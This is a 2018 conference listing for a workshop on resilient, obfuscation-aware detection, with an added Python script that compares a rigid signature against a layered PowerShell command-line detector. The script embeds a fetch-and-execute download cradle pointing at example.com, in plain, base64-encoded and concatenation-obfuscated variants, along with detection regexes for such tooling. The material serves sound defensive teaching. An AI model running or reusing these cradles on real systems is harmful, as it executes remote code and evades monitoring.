Thursday, October 4 • 13:30 - 17:30
Developing Resilient Detections (with Obfuscation & Evasion in Mind)



WARNING: Heavy obfuscation, evasion and general offensive techniques will be demonstrated to challenge and improve attendees’ defensive thinking and detection approaches!

Offensive tradecraft and "living off the land" techniques are discovered, developed and released to the public at breakneck speeds. Attackers begin using these techniques within hours of their release. However, defenders often spend days, weeks or months identifying and reactively creating signatures for these techniques. Often these reactive signatures are overly rigid; therefore, they are easily bypassed by simple modifications to the command or technique.

In this workshop we will:
    * Develop multiple layers of resilient host-based and network-based detections for several relevant "living off the land" attack techniques
    * Introduce incremental layers of obfuscation and evasion techniques to the attacker commands and payloads to iteratively evade and harden our detection approach
    * Learn about numerous host-based artifacts we can use for detection purposes (process arguments, common persistence locations, image load events, prefetch files, Shimcache, Amcache, SRUM (System Resource Usage Monitor), etc.)
    * Implement detection logic in numerous formats including IOCs (Indicators of Compromise), YARA rules, and Snort signatures
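The rigid-versus-resilient point made above, as an added example written for this page (not material from the workshop or its trainers): a literal signature for the first-seen form of a PowerShell download cradle is run over constructed process-creation command lines alongside a layered detection that first normalises the line (casing, whitespace, escape characters, string concatenation, inlined decoding of any -EncodedCommand argument) and then scores several weak indicators together. The command lines, indicator weights and alert threshold are constructed assumptions for the demonstration, not figures from any real environment.

```python
"""Rigid vs resilient detection over constructed process-creation command lines.

Added example, not the workshop's own material. Compares a brittle
string-match signature with a layered detection that normalises the
command line, decodes -EncodedCommand payloads, undoes simple string
concatenation, and only alerts when several weak indicators co-occur.
"""
import base64
import re

# Constructed payload: the classic download cradle, encoded the way
# powershell.exe expects for -EncodedCommand (UTF-16LE, then base64).
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.com/a')"
ENC = base64.b64encode(CRADLE.encode("utf-16le")).decode()

# Constructed sample events: three variants of one technique, two benign lines.
SAMPLE_EVENTS = {
    "plain":      f"powershell.exe -NoProfile -EncodedCommand {ENC}",
    "abbrev":     f"PoWeRsHeLl -nop -w hidden -ec {ENC}",  # casing + parameter prefixes
    "concat":     ("powershell -nop -c \"&('I'+'EX') (New-Object ('Net.'+'WebClient'))"
                   ".('Down'+'loadString').Invoke('http://example.com/a')\""),
    "benign_ps":  r"powershell.exe -NoProfile -File C:\scripts\inventory.ps1",
    "benign_exe": r'"C:\Program Files\Vendor\tool.exe" --update',
}

# Reactive, literal signature: the exact form first seen in the wild.
RIGID = re.compile(r"powershell\.exe .*-EncodedCommand [A-Za-z0-9+/=]+")


def rigid_detect(cmdline):
    """Case-sensitive, exact-flag match; any cosmetic change defeats it."""
    return RIGID.search(cmdline) is not None


# -e / -ec / -enc / -encodedcommand followed by a base64 blob (any casing).
ENCODED_ARG = re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
# 'Down'+'loadString'  ->  'DownloadString'
CONCAT = re.compile(r"['\"]\s*\+\s*['\"]")


def normalise(cmdline):
    """Layer 1: collapse whitespace, inline decoded -EncodedCommand payloads,
    fold casing, strip PowerShell (`) and cmd (^) escapes, undo concatenation."""
    text = " ".join(cmdline.split())
    for blob in ENCODED_ARG.findall(text):  # decode before lowercasing; base64 is case-sensitive
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-16le")
        except (ValueError, UnicodeDecodeError):
            continue
        text += " " + decoded  # decoded payload is analysed alongside the raw line
    text = text.lower().replace("`", "").replace("^", "")
    return CONCAT.sub("", text)


# Weak indicators and assumed weights; no single one is an alert on its own.
INDICATORS = {
    "download_cradle": (re.compile(r"net\.webclient|downloadstring|downloadfile|invoke-webrequest|\biwr\b"), 3),
    "expression_eval": (re.compile(r"\biex\b|invoke-expression"), 3),
    "encoded_command": (ENCODED_ARG, 2),
    "hidden_window":   (re.compile(r"-w(?:indowstyle)?\s+(?:hidden|1)\b"), 1),
    "no_profile":      (re.compile(r"-nop(?:rofile)?\b"), 1),
    "policy_bypass":   (re.compile(r"-e(?:p|xecutionpolicy)\s+bypass"), 1),
}
THRESHOLD = 4  # assumed; tune against the false-positive rate of the estate


def score(cmdline):
    """Layer 2: return (total weight, names of indicators that fired)."""
    text = normalise(cmdline)
    hits = [name for name, (pattern, _) in INDICATORS.items() if pattern.search(text)]
    return sum(INDICATORS[name][1] for name in hits), hits


def resilient_detect(cmdline):
    return score(cmdline)[0] >= THRESHOLD


def evaluate(events=SAMPLE_EVENTS):
    """Map each sample name to (rigid verdict, resilient verdict)."""
    return {name: (rigid_detect(c), resilient_detect(c)) for name, c in events.items()}


if __name__ == "__main__":
    for name, (rigid, resilient) in evaluate().items():
        print(f"{name:<11} rigid={rigid!s:<5} resilient={resilient}  hits={score(SAMPLE_EVENTS[name])[1]}")
```

The rigid signature fires only on the plain sample; the abbreviated-flag and concatenated variants pass it untouched, while the layered detection catches all three and leaves both benign lines below threshold (the -NoProfile script run scores a single weak indicator). Process arguments are only one of the artifacts listed above; the same scoring approach extends to the other host-based sources once their values are normalised the same way.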

The trainers have several years of real-world experience creating, tuning and enriching real-time detections that run on more than 10 million endpoints in hundreds of environments around the world. This firsthand experience will help facilitate conversations around false positives, detection performance and signal-to-noise ratios, concepts that are often overlooked (and sometimes less relevant) when dealing only with smaller environments.


Daniel Bohannon

Matthew Dunwoody (@matthewdunwoody) and Daniel Bohannon (@danielhbohannon) are Applied Security Researchers with FireEye's Advanced Practices Team, where they research attacker activity and develop effective detection signatures and processes (among other things). Matthew previously...

Thursday October 4, 2018 13:30 - 17:30 CEST
03. Chimay Novotel